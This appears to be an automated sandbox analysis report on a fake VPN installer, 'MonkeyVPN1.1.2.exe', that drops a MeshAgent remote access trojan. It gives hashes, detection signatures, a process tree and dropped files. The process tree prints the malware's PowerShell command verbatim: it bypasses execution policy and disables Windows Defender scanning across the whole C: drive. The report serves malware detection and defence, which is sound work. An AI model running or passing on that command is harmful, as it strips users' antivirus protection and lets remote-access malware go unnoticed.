Analysis

  • max time kernel
    123s
  • max time network
    144s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags
    arch:x64, arch:x86, image:win10v2004-20240802-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    24-09-2024 19:27

General

  • Target

    MonkeyVPN1.1.2.exe

  • Size

    43.2MB

  • MD5

    f3696254e6992deccbff25ab0af2ebc8

  • SHA1

    54ca8798c4e4eb8a455769ab706cc3de7fa1917d

  • SHA256

    ce92f52a6bc1f39cb592766cbf17e5bed63fa59eda5c88a961517ba3da5b49d3

  • SHA512

    fc58762f3436e0c32d57ffdba6f3fc3eeb176a52eed93c41b3c867fd24e5eb431bb46a2e89c375598ae37c83ec726dc74b1a61ee18e5c583e339ad4a3de1e8e7

  • SSDEEP

    786432:W+ZLhn5jG92pLhIvTIUBEiigLdfKRo8lS1h2a35VdZn33DmzBt/vWJZlZj1SXgfK:WULhn5jGWVIbIUBUsxMlmV3nHnnD6TX5

Malware Config

Signatures

  • Detects MeshAgent payload 1 IoCs
  • MeshAgent

    MeshAgent is an open source remote access trojan written in C++.

  • Blocklisted process makes network request 3 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Uses the powershell.exe command.

  • Sets service image path in registry 2 TTPs 1 IoCs
  • Executes dropped EXE 3 IoCs
  • Loads dropped DLL 2 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Enumerates connected drives 3 TTPs 46 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Drops file in System32 directory 64 IoCs
  • UPX packed file 3 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • Modifies data under HKEY_USERS 52 IoCs
  • Modifies system certificate store 2 TTPs 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of WriteProcessMemory 41 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\MonkeyVPN1.1.2.exe
    "C:\Users\Admin\AppData\Local\Temp\MonkeyVPN1.1.2.exe"
    1⤵
    • Modifies system certificate store
    • Suspicious use of WriteProcessMemory
    PID:492
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2368
      • C:\Program Files\Google\Chrome\Application\chrome.exe
        "C:\Program Files\Google\Chrome\Application\chrome.exe"
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of WriteProcessMemory
        PID:4956
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:2392
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell "Add-MpPreference -ExclusionExtension '.exe' -Force"
            5⤵
            • Command and Scripting Interpreter: PowerShell
            PID:400
          • C:\Users\Admin\AppData\Local\naver\naver.exe
            C:\Users\Admin\AppData\Local\naver\naver.exe -install
            5⤵
            • Sets service image path in registry
            • Executes dropped EXE
            PID:4420
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NonInteractive " Function Disable-ExecutionPolicy {($ctx = $executionContext.GetType().GetField(\"_context\",\"NonPublic,Instance\").GetValue($executionContext)).GetType().GetField(\"_authorizationManager\",\"NonPublic,Instance\").SetValue($ctx, (New-Object System.Management.Automation.AuthorizationManager \"Microsoft.PowerShell\"))} Disable-ExecutionPolicy ; Set-MpPreference -DisableIOAVProtection $true; Set-MpPreference -DisableScriptScanning 1; Add-MpPreference -ExclusionPath 'C:\*' -Force; Add-MpPreference -ExclusionExtension '.exe' -Force; "
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1408
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c start.exe
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1604
      • C:\Users\Admin\AppData\Local\Temp\start.exe
        start.exe
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2892
        • C:\Windows\SysWOW64\msiexec.exe
          msiexec.exe /i C:\Users\Admin\AppData\Local\Temp\MSI84BB.tmp
          4⤵
          • Enumerates connected drives
          • System Location Discovery: System Language Discovery
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of FindShellTrayWindow
          PID:1180
  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=4336,i,8293235976513689021,7261015831736501466,262144 --variations-seed-version --mojo-platform-channel-handle=3792 /prefetch:8
    1⤵
    PID:3904
  • C:\Windows\system32\msiexec.exe
    C:\Windows\system32\msiexec.exe /V
    1⤵
    • Enumerates connected drives
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:652
    • C:\Windows\syswow64\MsiExec.exe
      C:\Windows\syswow64\MsiExec.exe -Embedding A1A994092043BF518784C20154836C06 C
      2⤵
      • Loads dropped DLL
      • System Location Discovery: System Language Discovery
      PID:376
  • C:\Users\Admin\AppData\Local\naver\naver.exe
    "C:\Users\Admin\AppData\Local\naver\naver.exe" --meshServiceName="naver Service"
    1⤵
    • Executes dropped EXE
    • Drops file in System32 directory
    • Modifies data under HKEY_USERS
    • Suspicious use of WriteProcessMemory
    PID:2768
    • C:\Windows\System32\wbem\wmic.exe
      wmic SystemEnclosure get ChassisTypes
      2⤵
      PID:2144
    • C:\Windows\system32\wbem\wmic.exe
      wmic os get oslanguage /FORMAT:LIST
      2⤵
      PID:4556
    • C:\Windows\System32\wbem\wmic.exe
      wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
      2⤵
      PID:4224
    • C:\Windows\system32\wbem\wmic.exe
      wmic os get oslanguage /FORMAT:LIST
      2⤵
      PID:3212
    • C:\Windows\System32\wbem\wmic.exe
      wmic SystemEnclosure get ChassisTypes
      2⤵
      PID:5076
    • C:\Windows\System32\wbem\wmic.exe
      wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
      2⤵
      PID:1684
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -noprofile -nologo -command -
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Modifies data under HKEY_USERS
      PID:1148

Network

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
    Filesize
      2KB
    MD5
      2f57fde6b33e89a63cf0dfdd6e60a351
    SHA1
      445bf1b07223a04f8a159581a3d37d630273010f
    SHA256
      3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55
    SHA512
      42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
    Filesize
      53KB
    MD5
      a26df49623eff12a70a93f649776dab7
    SHA1
      efb53bd0df3ac34bd119adf8788127ad57e53803
    SHA256
      4ebde1c12625cb55034d47e5169f709b0bd02a8caa76b5b9854efad7f4710245
    SHA512
      e5f9b8645fb2a50763fcbffe877ca03e9cadf099fe2d510b74bfa9ff18d0a6563d11160e00f495eeefebde63450d0ade8d6b6a824e68bd8a59e1971dc842709c

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize
      944B
    MD5
      62477035d09eca55a37aa3ec60270868
    SHA1
      1ba72f9dd882e481b7b41dc21865459e9ee498a3
    SHA256
      070316ee9aeb1f07c2574cfc3adcd262a0bd9bee56561a759c15cd8112bc8d64
    SHA512
      c3922b9dc83102b1857488ce88fcc8a069892e2cf02663fa8f2f53546bcaadea30c72b5883b89e6266f01b8f8add45614ceeb21b874b1383dd3587798a6de449

  • C:\Users\Admin\AppData\Local\Temp\MSI84BB.tmp
    Filesize
      30.3MB
    MD5
      71141c5e6c5aa8e363f64c6014588d9b
    SHA1
      fd759473d536ce9423d3e9efb6f0b118f149e0d4
    SHA256
      26188d91a417a4c4c8c9226015ad6b5f4ddb86ca3bac9031206efc9e45acfc8e
    SHA512
      187314ecf0395d2245d37b0b3f2361896dcf6f6fa0d30b0c724c8a73a9d45c1798357654d863c8b304f775bfd32f0c30e0735a7abb5edbe0aeb4166046472b41

  • C:\Users\Admin\AppData\Local\Temp\MSIA207.tmp
    Filesize
      298KB
    MD5
      684f2d21637cb5835172edad55b6a8d9
    SHA1
      5eac3b8d0733aa11543248b769d7c30d2c53fcdb
    SHA256
      da1fe86141c446921021bb26b6fe2bd2d1bb51e3e614f46f8103ffad8042f2c0
    SHA512
      7b626c2839ac7df4dd764d52290da80f40f7c02cb70c8668a33ad166b0bcb0c1d4114d08a8754e0ae9c0210129ae7e885a90df714ca79bd946fbd8009848538c

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_pslp4zjb.qfh.ps1
    Filesize
      60B
    MD5
      d17fe0a3f47be24a6453e9ef58c94641
    SHA1
      6ab83620379fc69f80c0242105ddffd7d98d5d9d
    SHA256
      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
    SHA512
      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • C:\Users\Admin\AppData\Local\Temp\start.exe
    Filesize
      30.4MB
    MD5
      5b073f98aab6e4f779aadd9f9d4b75a2
    SHA1
      c81700159450dc0ac7c40f7e73203a963fd83e9a
    SHA256
      0b04da17c658f67b1b74afb9831e09664dc976a401350a9b8e1f76c1e3c5caca
    SHA512
      84c4be46cbdbc40e5a90e2dce2a1c58ecf6816cc47cc9aa4105730deefb8c691ce406aa35b90152baffcf93564dec4ce747995ee0ba2573f6fa480f3e143780d

  • C:\Users\Admin\AppData\Local\naver\naver.exe
    Filesize
      5.3MB
    MD5
      2bf9eaf0d2693850c39817b4b797cf43
    SHA1
      e93f0ff794ab20bdda2f81d210f4869823455888
    SHA256
      325502bedbb2a25218b2004535a679a8fe08daf44ad87ebe98db7dc4f3278026
    SHA512
      2b7b6ca1bcffcb5a6007f938186dff14549bde8d8f5e61883525133a083d69812d28a1a41507a38d210283b4766b67442828259f45f7996f9e5beb4784f2166c

  • C:\Users\Admin\AppData\Local\naver\naver.msh
    Filesize
      22KB
    MD5
      2dd515ea546a81398d94dd15e3b4d55c
    SHA1
      eb0b0fca721a296906166b7e972559b87353b726
    SHA256
      becc832e6028a35aa50af95a2d80bcccbf0fcc8e9d1a333cd0661a77bdf089b2
    SHA512
      439b241e56783b766c70aaacfc2efe59b1136cc8e0e5377e606697d0b3048be6787a0a2ce2a549a294633dda8a39f02f2f457d999ce2ec22f74ef07daf912dfb

  • memory/492-1-0x0000000000560000-0x00000000036FF000-memory.dmp
    Filesize
      49.6MB

  • memory/492-48-0x0000000000560000-0x00000000036FF000-memory.dmp
    Filesize
      49.6MB

  • memory/492-38-0x0000000000560000-0x00000000036FF000-memory.dmp
    Filesize
      49.6MB

  • memory/1408-31-0x00007FF837800000-0x00007FF8382C1000-memory.dmp
    Filesize
      10.8MB

  • memory/1408-15-0x00007FF837800000-0x00007FF8382C1000-memory.dmp
    Filesize
      10.8MB

  • memory/1408-4-0x00000155F8340000-0x00000155F8362000-memory.dmp
    Filesize
      136KB

  • memory/1408-3-0x00007FF837803000-0x00007FF837805000-memory.dmp
    Filesize
      8KB

  • memory/1408-25-0x00007FF837800000-0x00007FF8382C1000-memory.dmp
    Filesize
      10.8MB

  • memory/2368-32-0x000002697C650000-0x000002697C6C6000-memory.dmp
    Filesize
      472KB

  • memory/2368-28-0x000002697C600000-0x000002697C644000-memory.dmp
    Filesize
      272KB

  • memory/2368-50-0x00007FF837800000-0x00007FF8382C1000-memory.dmp
    Filesize
      10.8MB

  • memory/2368-51-0x00007FF837800000-0x00007FF8382C1000-memory.dmp
    Filesize
      10.8MB

  • memory/2368-27-0x00007FF837800000-0x00007FF8382C1000-memory.dmp
    Filesize
      10.8MB

  • memory/2368-70-0x00007FF837800000-0x00007FF8382C1000-memory.dmp
    Filesize
      10.8MB

  • memory/2368-26-0x00007FF837800000-0x00007FF8382C1000-memory.dmp
    Filesize
      10.8MB